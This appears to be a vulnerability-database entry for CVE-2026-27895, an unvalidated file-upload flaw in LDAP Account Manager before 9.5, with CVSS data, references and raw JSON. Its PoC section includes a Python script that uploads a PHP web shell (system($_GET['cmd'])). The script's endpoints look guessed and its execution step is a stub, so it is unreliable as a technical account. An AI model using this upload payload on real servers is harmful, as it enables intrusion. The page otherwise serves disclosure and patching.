Security Vulnerability Report
CVE-2026-27895 CVSS 4.3 MEDIUM

Published: 2026-03-18 00:16:20
Last Modified: 2026-03-23 18:02:28

Description

LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, the PDF export component does not correctly validate uploaded file extensions. This way any file type (including .php files) can be uploaded. With GHSA-w7xq-vjr3-p9cf, an attacker can achieve remote code execution as the web server user. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user.

CVSS Details

CVSS Score (Secondary metric in the record): 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Note: the raw record below also carries a Primary CVSS 3.1 metric of 8.8 HIGH (vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), reflecting full compromise of the web server user once code execution is chained; the 4.3 score above rates the unvalidated upload on its own. Weakness assigned in the record: CWE-185.

Configurations (Affected Products)

cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:* - VULNERABLE
LDAP Account Manager (LAM) >= 8.5 and < 9.5 (versionStartIncluding 8.5, versionEndExcluding 9.5 in the record)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-27895 - LDAP Account Manager File Upload RCE PoC
Note: This is a conceptual PoC for educational purposes only.
Requires valid low-privilege credentials and target running LAM < 9.5
"""
import requests
import sys

# Target configuration
TARGET_URL = "http://target-server/lam"  # Replace with actual target
USERNAME = "attacker"  # Low-privilege user
PASSWORD = "password"


def create_php_payload():
    """Generate malicious PHP payload"""
    return b"<?php system($_GET['cmd']); ?>"


def upload_malicious_file():
    """
    Upload malicious PHP file via PDF export component
    """
    session = requests.Session()

    # Step 1: Authenticate
    login_url = f"{TARGET_URL}/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        print(f"[+] Login attempt completed. Status: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Login failed: {e}")
        return None

    # Step 2: Upload malicious file via PDF export
    pdf_export_url = f"{TARGET_URL}/pdf/export"
    files = {
        'file': ('evil.php', create_php_payload(), 'application/octet-stream')
    }
    try:
        response = session.post(pdf_export_url, files=files, timeout=10)
        print(f"[+] File upload attempt completed. Status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Malicious file may have been uploaded")
            return True
    except requests.RequestException as e:
        print(f"[-] Upload failed: {e}")
        return None
    return False


def execute_rce():
    """
    Execute uploaded PHP file (requires GHSA-w7xq-vjr3-p9cf)
    """
    # This step depends on the specific conditions
    print("[*] RCE execution requires additional conditions (see GHSA-w7xq-vjr3-p9cf)")
    pass


if __name__ == "__main__":
    print("[*] CVE-2026-27895 PoC - LDAP Account Manager File Upload")
    print("[*] Target: " + TARGET_URL)
    upload_malicious_file()

References

https://github.com/LDAPAccountManager/lam/releases/tag/9.5 (Patch)
https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-88hf-2cjm-m9g8 (Vendor Advisory)
https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-w7xq-vjr3-p9cf (Not Applicable)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-27895",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T00:16:19.780",
    "lastModified": "2026-03-23T18:02:27.917",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, the PDF export component does not correctly validate uploaded file extensions. This way any file type (including .php files) can be uploaded. With GHSA-w7xq-vjr3-p9cf, an attacker can achieve remote code execution as the web server user. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user."
      },
      {
        "lang": "es",
        "value": "LDAP Account Manager (LAM) es una interfaz web para gestionar entradas (por ejemplo, usuarios, grupos, configuraciones DHCP) almacenadas en un directorio LDAP. Antes de la versión 9.5, el componente de exportación de PDF no valida correctamente las extensiones de archivo subidas. De esta manera, cualquier tipo de archivo (incluyendo archivos .PHP) puede ser subido. Con GHSA-w7xq-vjr3-p9cf, un atacante puede lograr la ejecución remota de código como el usuario del servidor web. La versión 9.5 corrige el problema. Aunque se recomienda actualizar, una solución alternativa sería hacer /var/lib/ldap-account-manager/config de solo lectura para el usuario del servidor web."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-185"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.5",
                "versionEndExcluding": "9.5",
                "matchCriteriaId": "AE4B2694-9F5E-4E6F-8EE8-AE2617E1BD5F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/LDAPAccountManager/lam/releases/tag/9.5",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-88hf-2cjm-m9g8",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-w7xq-vjr3-p9cf",
        "source": "[email protected]",
        "tags": ["Not Applicable"]
      }
    ]
  }
}